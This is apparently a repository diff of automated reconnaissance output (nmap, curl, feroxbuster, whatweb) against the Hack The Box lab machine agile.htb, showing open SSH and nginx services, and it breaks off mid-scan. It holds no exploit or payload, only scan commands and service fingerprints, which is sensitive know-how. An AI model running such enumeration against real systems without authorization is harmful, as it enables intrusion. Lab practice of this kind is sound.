| sntrup761x25519-sha512@openssh.com
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (4)
| rsa-sha2-512
| rsa-sha2-256
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
|_banner: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 5 12:58:00 2023 -- 1 IP address (1 host up) scanned in 5.28 seconds

95
HTB/agile/results/agile.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml Normal file
View File

@@ -0,0 +1,95 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sun Mar 5 12:57:55 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/simon/htb/agile/results/agile.htb/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml agile.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/simon/htb/agile/results/agile.htb/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml agile.htb" start="1678017475" startstr="Sun Mar 5 12:57:55 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="22"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1678017476"/>
<taskend task="NSE" time="1678017476"/>
<taskbegin task="NSE" time="1678017476"/>
<taskend task="NSE" time="1678017476"/>
<taskbegin task="SYN Stealth Scan" time="1678017476"/>
<taskend task="SYN Stealth Scan" time="1678017476" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1678017476"/>
<taskend task="Service scan" time="1678017477" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1678017477"/>
<taskend task="NSE" time="1678017480"/>
<taskbegin task="NSE" time="1678017480"/>
<taskend task="NSE" time="1678017480"/>
<host starttime="1678017476" endtime="1678017480"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.29.4" addrtype="ipv4"/>
<hostnames>
<hostname name="agile.htb" type="user"/>
<hostname name="agile.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.9p1 Ubuntu 3ubuntu0.1" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.9p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 256 f4bcee21d71f1aa26572212d5ba6f700 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCeVL2Hl8/LXWurlu46JyqOyvUHtAwTrz1EYdY5dXVi9BfpPwsPTf+zzflV+CGdflQRNFKPDS8RJuiXQa40xs9o=&#xa; 256 65c1480d88cbb975a02ca5e6377e5106 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEcaZPDjlx21ppN0y2dNT1Jb8aPZwfvugIeN6wdUH1cK"><table>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="fingerprint">f4bcee21d71f1aa26572212d5ba6f700</elem>
<elem key="bits">256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCeVL2Hl8/LXWurlu46JyqOyvUHtAwTrz1EYdY5dXVi9BfpPwsPTf+zzflV+CGdflQRNFKPDS8RJuiXQa40xs9o=</elem>
</table>
<table>
<elem key="type">ssh-ed25519</elem>
<elem key="fingerprint">65c1480d88cbb975a02ca5e6377e5106</elem>
<elem key="bits">256</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIEcaZPDjlx21ppN0y2dNT1Jb8aPZwfvugIeN6wdUH1cK</elem>
</table>
</script><script id="ssh2-enum-algos" output="&#xa; kex_algorithms: (10)&#xa; curve25519-sha256&#xa; curve25519-sha256@libssh.org&#xa; ecdh-sha2-nistp256&#xa; ecdh-sha2-nistp384&#xa; ecdh-sha2-nistp521&#xa; sntrup761x25519-sha512@openssh.com&#xa; diffie-hellman-group-exchange-sha256&#xa; diffie-hellman-group16-sha512&#xa; diffie-hellman-group18-sha512&#xa; diffie-hellman-group14-sha256&#xa; server_host_key_algorithms: (4)&#xa; rsa-sha2-512&#xa; rsa-sha2-256&#xa; ecdsa-sha2-nistp256&#xa; ssh-ed25519&#xa; encryption_algorithms: (6)&#xa; chacha20-poly1305@openssh.com&#xa; aes128-ctr&#xa; aes192-ctr&#xa; aes256-ctr&#xa; aes128-gcm@openssh.com&#xa; aes256-gcm@openssh.com&#xa; mac_algorithms: (10)&#xa; umac-64-etm@openssh.com&#xa; umac-128-etm@openssh.com&#xa; hmac-sha2-256-etm@openssh.com&#xa; hmac-sha2-512-etm@openssh.com&#xa; hmac-sha1-etm@openssh.com&#xa; umac-64@openssh.com&#xa; umac-128@openssh.com&#xa; hmac-sha2-256&#xa; hmac-sha2-512&#xa; hmac-sha1&#xa; compression_algorithms: (2)&#xa; none&#xa; zlib@openssh.com"><table key="kex_algorithms">
<elem>curve25519-sha256</elem>
<elem>curve25519-sha256@libssh.org</elem>
<elem>ecdh-sha2-nistp256</elem>
<elem>ecdh-sha2-nistp384</elem>
<elem>ecdh-sha2-nistp521</elem>
<elem>sntrup761x25519-sha512@openssh.com</elem>
<elem>diffie-hellman-group-exchange-sha256</elem>
<elem>diffie-hellman-group16-sha512</elem>
<elem>diffie-hellman-group18-sha512</elem>
<elem>diffie-hellman-group14-sha256</elem>
</table>
<table key="server_host_key_algorithms">
<elem>rsa-sha2-512</elem>
<elem>rsa-sha2-256</elem>
<elem>ecdsa-sha2-nistp256</elem>
<elem>ssh-ed25519</elem>
</table>
<table key="encryption_algorithms">
<elem>chacha20-poly1305@openssh.com</elem>
<elem>aes128-ctr</elem>
<elem>aes192-ctr</elem>
<elem>aes256-ctr</elem>
<elem>aes128-gcm@openssh.com</elem>
<elem>aes256-gcm@openssh.com</elem>
</table>
<table key="mac_algorithms">
<elem>umac-64-etm@openssh.com</elem>
<elem>umac-128-etm@openssh.com</elem>
<elem>hmac-sha2-256-etm@openssh.com</elem>
<elem>hmac-sha2-512-etm@openssh.com</elem>
<elem>hmac-sha1-etm@openssh.com</elem>
<elem>umac-64@openssh.com</elem>
<elem>umac-128@openssh.com</elem>
<elem>hmac-sha2-256</elem>
<elem>hmac-sha2-512</elem>
<elem>hmac-sha1</elem>
</table>
<table key="compression_algorithms">
<elem>none</elem>
<elem>zlib@openssh.com</elem>
</table>
</script><script id="ssh-auth-methods" output="&#xa; Supported authentication methods: &#xa; publickey&#xa; password"><table key="Supported authentication methods">
<elem>publickey</elem>
<elem>password</elem>
</table>
</script><script id="banner" output="SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"/></port>
</ports>
<times srtt="242608" rttvar="242608" to="1213040"/>
</host>
<taskbegin task="NSE" time="1678017480"/>
<taskend task="NSE" time="1678017480"/>
<taskbegin task="NSE" time="1678017480"/>
<taskend task="NSE" time="1678017480"/>
<runstats><finished time="1678017480" timestr="Sun Mar 5 12:58:00 2023" summary="Nmap done at Sun Mar 5 12:58:00 2023; 1 IP address (1 host up) scanned in 5.28 seconds" elapsed="5.28" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

0
HTB/agile/results/agile.htb/scans/tcp80/tcp_80_http_agile.htb_vhosts_subdomains-top1million-110000.txt Normal file
View File

36
HTB/agile/results/agile.htb/scans/tcp80/tcp_80_http_curl.html Normal file
View File

@@ -0,0 +1,36 @@
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 05 Mar 2023 11:57:55 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Thu, 01 Dec 2022 18:20:40 GMT
Connection: keep-alive
ETag: "6388f078-264"
Accept-Ranges: bytes
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>
<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>
<p><em>Thank you for using nginx.</em></p>
</body>
</html>

1
HTB/agile/results/agile.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt Normal file
View File

@@ -0,0 +1 @@
200 GET 25l 69w 612c http://agile.htb/

93
HTB/agile/results/agile.htb/scans/tcp80/tcp_80_http_nmap.txt Normal file
View File

@@ -0,0 +1,93 @@
# Nmap 7.93 scan initiated Sun Mar 5 12:57:55 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/tcp80/xml/tcp_80_http_nmap.xml agile.htb
Nmap scan report for agile.htb (10.129.29.4)
Host is up, received user-set (0.11s latency).
Scanned at 2023-03-05 12:57:58 CET for 238s
Bug in http-security-headers: no string output.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-php-version: Logo query returned unknown hash e3eb0a1df437f3f97a64aca5952c8ea0
|_Credits query returned unknown hash e3eb0a1df437f3f97a64aca5952c8ea0
|_http-errors: Couldn't find any error pages.
|_http-chrono: Request times for /; avg: 257.75ms; min: 207.49ms; max: 319.98ms
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.tenable.com/plugins/nessus/55976
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
| https://www.securityfocus.com/bid/49303
|_ https://seclists.org/fulldisclosure/2011/Aug/175
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-feed: Couldn't find any feeds.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-mobileversion-checker: No mobile version detected.
|_http-malware-host: Host appears to be clean
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1
| Longest directory structure:
| Depth: 0
| Dir: /
| Total files found (by extension):
|_ Other: 1
|_http-comments-displayer: Couldn't find any comments.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
| http-vhosts:
|_128 names had status 301
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-referer-checker: Couldn't find any cross-domain scripts.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
| http-methods:
|_ Supported Methods: GET HEAD
| http-headers:
| Server: nginx/1.18.0 (Ubuntu)
| Date: Sun, 05 Mar 2023 11:58:06 GMT
| Content-Type: text/html
| Content-Length: 612
| Last-Modified: Thu, 01 Dec 2022 18:20:40 GMT
| Connection: close
| ETag: "6388f078-264"
| Accept-Ranges: bytes
|
|_ (Request type: HEAD)
|_http-title: Welcome to nginx!
|_http-date: Sun, 05 Mar 2023 11:58:06 GMT; -2s from local time.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 5 13:01:56 2023 -- 1 IP address (1 host up) scanned in 240.76 seconds

BIN
HTB/agile/results/agile.htb/scans/tcp80/tcp_80_http_screenshot.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 898 KiB

40
HTB/agile/results/agile.htb/scans/tcp80/tcp_80_http_whatweb.txt Normal file
View File

@@ -0,0 +1,40 @@
WhatWeb report for http://agile.htb:80
Status : 200 OK
Title : Welcome to nginx!
IP : 10.129.29.4
Country : RESERVED, ZZ
Summary : HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], nginx[1.18.0]
Detected Plugins:
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : nginx/1.18.0 (Ubuntu) (from server string)
[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.
Version : 1.18.0
Website : http://nginx.net/
HTTP Headers:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 05 Mar 2023 11:58:10 GMT
Content-Type: text/html
Last-Modified: Thu, 01 Dec 2022 18:20:40 GMT
Transfer-Encoding: chunked
Connection: close
ETag: W/"6388f078-264"
Content-Encoding: gzip

104
HTB/agile/results/agile.htb/scans/tcp80/xml/tcp_80_http_nmap.xml Normal file
View File

@@ -0,0 +1,104 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sun Mar 5 12:57:55 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/tcp80/xml/tcp_80_http_nmap.xml agile.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/simon/htb/agile/results/agile.htb/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/tcp80/xml/tcp_80_http_nmap.xml agile.htb" start="1678017475" startstr="Sun Mar 5 12:57:55 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="80"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1678017478"/>
<taskend task="NSE" time="1678017478"/>
<taskbegin task="NSE" time="1678017478"/>
<taskend task="NSE" time="1678017478"/>
<taskbegin task="NSE" time="1678017478"/>
<taskend task="NSE" time="1678017478"/>
<taskbegin task="SYN Stealth Scan" time="1678017478"/>
<taskend task="SYN Stealth Scan" time="1678017478" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1678017478"/>
<taskend task="Service scan" time="1678017484" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1678017484"/>
<taskprogress task="NSE" time="1678017515" percent="99.67" remaining="1" etc="1678017515"/>
<taskprogress task="NSE" time="1678017545" percent="99.67" remaining="1" etc="1678017545"/>
<taskprogress task="NSE" time="1678017575" percent="99.67" remaining="1" etc="1678017575"/>
<taskprogress task="NSE" time="1678017605" percent="99.67" remaining="1" etc="1678017605"/>
<taskprogress task="NSE" time="1678017635" percent="99.67" remaining="1" etc="1678017635"/>
<taskprogress task="NSE" time="1678017665" percent="99.67" remaining="1" etc="1678017666"/>
<taskprogress task="NSE" time="1678017695" percent="99.67" remaining="1" etc="1678017696"/>
<taskend task="NSE" time="1678017715"/>
<taskbegin task="NSE" time="1678017715"/>
<taskend task="NSE" time="1678017716"/>
<taskbegin task="NSE" time="1678017716"/>
<taskend task="NSE" time="1678017716"/>
<host starttime="1678017478" endtime="1678017716"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.29.4" addrtype="ipv4"/>
<hostnames>
<hostname name="agile.htb" type="user"/>
<hostname name="agile.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="nginx" version="1.18.0" extrainfo="Ubuntu" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:igor_sysoev:nginx:1.18.0</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="http-php-version" output="Logo query returned unknown hash e3eb0a1df437f3f97a64aca5952c8ea0&#xa;Credits query returned unknown hash e3eb0a1df437f3f97a64aca5952c8ea0"/><script id="http-errors" output="Couldn&apos;t find any error pages."/><script id="http-chrono" output="Request times for /; avg: 257.75ms; min: 207.49ms; max: 319.98ms"/><script id="http-vuln-cve2011-3192" output="&#xa; VULNERABLE:&#xa; Apache byterange filter DoS&#xa; State: VULNERABLE&#xa; IDs: CVE:CVE-2011-3192 BID:49303&#xa; The Apache web server is vulnerable to a denial of service attack when numerous&#xa; overlapping byte ranges are requested.&#xa; Disclosure date: 2011-08-19&#xa; References:&#xa; https://www.tenable.com/plugins/nessus/55976&#xa; https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192&#xa; https://www.securityfocus.com/bid/49303&#xa; https://seclists.org/fulldisclosure/2011/Aug/175&#xa;"><table key="CVE-2011-3192">
<elem key="title">Apache byterange filter DoS</elem>
<elem key="state">VULNERABLE</elem>
<table key="ids">
<elem>CVE:CVE-2011-3192</elem>
<elem>BID:49303</elem>
</table>
<table key="description">
<elem>The Apache web server is vulnerable to a denial of service attack when numerous&#xa;overlapping byte ranges are requested.</elem>
</table>
<table key="dates">
<table key="disclosure">
<elem key="year">2011</elem>
<elem key="month">08</elem>
<elem key="day">19</elem>
</table>
</table>
<elem key="disclosure">2011-08-19</elem>
<table key="refs">
<elem>https://www.tenable.com/plugins/nessus/55976</elem>
<elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192</elem>
<elem>https://www.securityfocus.com/bid/49303</elem>
<elem>https://seclists.org/fulldisclosure/2011/Aug/175</elem>
</table>
</table>
</script><script id="http-drupal-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args number=&lt;number|all&gt; for deeper analysis)"/><script id="http-feed" output="Couldn&apos;t find any feeds."/><script id="http-wordpress-users" output="[Error] Wordpress installation was not found. We couldn&apos;t find wp-login.php"/><script id="http-mobileversion-checker" output="No mobile version detected."/><script id="http-malware-host" output="Host appears to be clean"/><script id="http-dombased-xss" output="Couldn&apos;t find any DOM based XSS."/><script id="http-sitemap-generator" output="&#xa; Directory structure:&#xa; /&#xa; Other: 1&#xa; Longest directory structure:&#xa; Depth: 0&#xa; Dir: /&#xa; Total files found (by extension):&#xa; Other: 1&#xa;"/><script id="http-comments-displayer" output="Couldn&apos;t find any comments."/><script id="http-devframework" output="Couldn&apos;t determine the underlying framework or CMS. Try increasing &apos;httpspider.maxpagecount&apos; value to spider more pages."/><script id="http-vhosts" output="&#xa;128 names had status 301"/><script id="http-fetch" output="Please enter the complete path of the directory to save data in."><elem key="ERROR">Please enter the complete path of the directory to save data in.</elem>
</script><script id="http-server-header" output="nginx/1.18.0 (Ubuntu)"><elem>nginx/1.18.0 (Ubuntu)</elem>
</script><script id="http-referer-checker" output="Couldn&apos;t find any cross-domain scripts."/><script id="http-jsonp-detection" output="Couldn&apos;t find any JSONP endpoints."/><script id="http-useragent-tester" output="&#xa; Status for browser useragent: 200&#xa; Allowed User Agents: &#xa; Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&#xa; libwww&#xa; lwp-trivial&#xa; libcurl-agent/1.0&#xa; PHP/&#xa; Python-urllib/2.5&#xa; GT::WWW&#xa; Snoopy&#xa; MFC_Tear_Sample&#xa; HTTP::Lite&#xa; PHPCrawl&#xa; URI::Fetch&#xa; Zend_Http_Client&#xa; http client&#xa; PECL::HTTP&#xa; Wget/1.13.4 (linux-gnu)&#xa; WWW-Mechanize/1.34"><elem key="Status for browser useragent">200</elem>
<table key="Allowed User Agents">
<elem>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</elem>
<elem>libwww</elem>
<elem>lwp-trivial</elem>
<elem>libcurl-agent/1.0</elem>
<elem>PHP/</elem>
<elem>Python-urllib/2.5</elem>
<elem>GT::WWW</elem>
<elem>Snoopy</elem>
<elem>MFC_Tear_Sample</elem>
<elem>HTTP::Lite</elem>
<elem>PHPCrawl</elem>
<elem>URI::Fetch</elem>
<elem>Zend_Http_Client</elem>
<elem>http client</elem>
<elem>PECL::HTTP</elem>
<elem>Wget/1.13.4 (linux-gnu)</elem>
<elem>WWW-Mechanize/1.34</elem>
</table>
</script><script id="http-csrf" output="Couldn&apos;t find any CSRF vulnerabilities."/><script id="http-stored-xss" output="Couldn&apos;t find any stored XSS vulnerabilities."/><script id="http-wordpress-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args search-limit=&lt;number|all&gt; for deeper analysis)"/><script id="http-methods" output="&#xa; Supported Methods: GET HEAD"><table key="Supported Methods">
<elem>GET</elem>
<elem>HEAD</elem>
</table>
</script><script id="http-headers" output="&#xa; Server: nginx/1.18.0 (Ubuntu)&#xa; Date: Sun, 05 Mar 2023 11:58:06 GMT&#xa; Content-Type: text/html&#xa; Content-Length: 612&#xa; Last-Modified: Thu, 01 Dec 2022 18:20:40 GMT&#xa; Connection: close&#xa; ETag: &quot;6388f078-264&quot;&#xa; Accept-Ranges: bytes&#xa; &#xa; (Request type: HEAD)&#xa;"/><script id="http-title" output="Welcome to nginx!"><elem key="title">Welcome to nginx!</elem>
</script><script id="http-date" output="Sun, 05 Mar 2023 11:58:06 GMT; -2s from local time."><elem key="date">2023-03-05T11:58:06+00:00</elem>
<elem key="delta">-2.0</elem>
</script><script id="http-litespeed-sourcecode-download" output="Request with null byte did not work. This web server might not be vulnerable"/><script id="http-config-backup" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-security-headers" output=""></script></port>
</ports>
<times srtt="113157" rttvar="113157" to="565785"/>
</host>
<taskbegin task="NSE" time="1678017716"/>
<taskend task="NSE" time="1678017716"/>
<taskbegin task="NSE" time="1678017716"/>
<taskend task="NSE" time="1678017716"/>
<taskbegin task="NSE" time="1678017716"/>
<taskend task="NSE" time="1678017716"/>
<runstats><finished time="1678017716" timestr="Sun Mar 5 13:01:56 2023" summary="Nmap done at Sun Mar 5 13:01:56 2023; 1 IP address (1 host up) scanned in 240.76 seconds" elapsed="240.76" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

128
HTB/agile/results/agile.htb/scans/xml/_full_tcp_nmap.xml Normal file
View File

@@ -0,0 +1,128 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sun Mar 5 12:57:19 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/simon/htb/agile/results/agile.htb/scans/_full_tcp_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/xml/_full_tcp_nmap.xml agile.htb -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/simon/htb/agile/results/agile.htb/scans/_full_tcp_nmap.txt -oX /home/simon/htb/agile/results/agile.htb/scans/xml/_full_tcp_nmap.xml agile.htb" start="1678017439" startstr="Sun Mar 5 12:57:19 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1678017440"/>
<taskend task="NSE" time="1678017440"/>
<taskbegin task="NSE" time="1678017440"/>
<taskend task="NSE" time="1678017440"/>
<taskbegin task="NSE" time="1678017440"/>
<taskend task="NSE" time="1678017440"/>
<taskbegin task="SYN Stealth Scan" time="1678017440"/>
<taskprogress task="SYN Stealth Scan" time="1678017471" percent="8.52" remaining="333" etc="1678017804"/>
<taskprogress task="SYN Stealth Scan" time="1678017513" percent="18.93" remaining="313" etc="1678017826"/>
<taskprogress task="SYN Stealth Scan" time="1678017555" percent="28.22" remaining="293" etc="1678017848"/>
<taskprogress task="SYN Stealth Scan" time="1678017597" percent="36.56" remaining="273" etc="1678017869"/>
<taskprogress task="SYN Stealth Scan" time="1678017627" percent="42.97" remaining="249" etc="1678017875"/>
<taskprogress task="SYN Stealth Scan" time="1678017657" percent="49.05" remaining="226" etc="1678017882"/>
<taskprogress task="SYN Stealth Scan" time="1678017687" percent="55.47" remaining="199" etc="1678017885"/>
<taskprogress task="SYN Stealth Scan" time="1678017717" percent="62.50" remaining="167" etc="1678017883"/>
<taskprogress task="SYN Stealth Scan" time="1678017747" percent="69.05" remaining="138" etc="1678017885"/>
<taskprogress task="SYN Stealth Scan" time="1678017777" percent="75.11" remaining="112" etc="1678017889"/>
<taskprogress task="SYN Stealth Scan" time="1678017807" percent="81.43" remaining="84" etc="1678017891"/>
<taskprogress task="SYN Stealth Scan" time="1678017837" percent="87.76" remaining="56" etc="1678017892"/>
<taskend task="SYN Stealth Scan" time="1678017900" extrainfo="65535 total ports"/>
<taskbegin task="Service scan" time="1678017900"/>
<taskend task="Service scan" time="1678017906" extrainfo="2 services on 1 host"/>
<taskbegin task="Traceroute" time="1678017924"/>
<taskend task="Traceroute" time="1678017924"/>
<taskbegin task="Parallel DNS resolution of 1 host." time="1678017924"/>
<taskend task="Parallel DNS resolution of 1 host." time="1678017924"/>
<taskbegin task="NSE" time="1678017924"/>
<taskend task="NSE" time="1678017928"/>
<taskbegin task="NSE" time="1678017928"/>
<taskend task="NSE" time="1678017928"/>
<taskbegin task="NSE" time="1678017928"/>
<taskend task="NSE" time="1678017928"/>
<host starttime="1678017440" endtime="1678017928"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.29.4" addrtype="ipv4"/>
<hostnames>
<hostname name="agile.htb" type="user"/>
<hostname name="agile.htb" type="PTR"/>
</hostnames>
<ports><extraports state="closed" count="65533">
<extrareasons reason="reset" count="65533" proto="tcp" ports="1-21,23-79,81-65535"/>
</extraports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.9p1 Ubuntu 3ubuntu0.1" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.9p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa; 256 f4bcee21d71f1aa26572212d5ba6f700 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCeVL2Hl8/LXWurlu46JyqOyvUHtAwTrz1EYdY5dXVi9BfpPwsPTf+zzflV+CGdflQRNFKPDS8RJuiXQa40xs9o=&#xa; 256 65c1480d88cbb975a02ca5e6377e5106 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEcaZPDjlx21ppN0y2dNT1Jb8aPZwfvugIeN6wdUH1cK"><table>
<elem key="type">ecdsa-sha2-nistp256</elem>
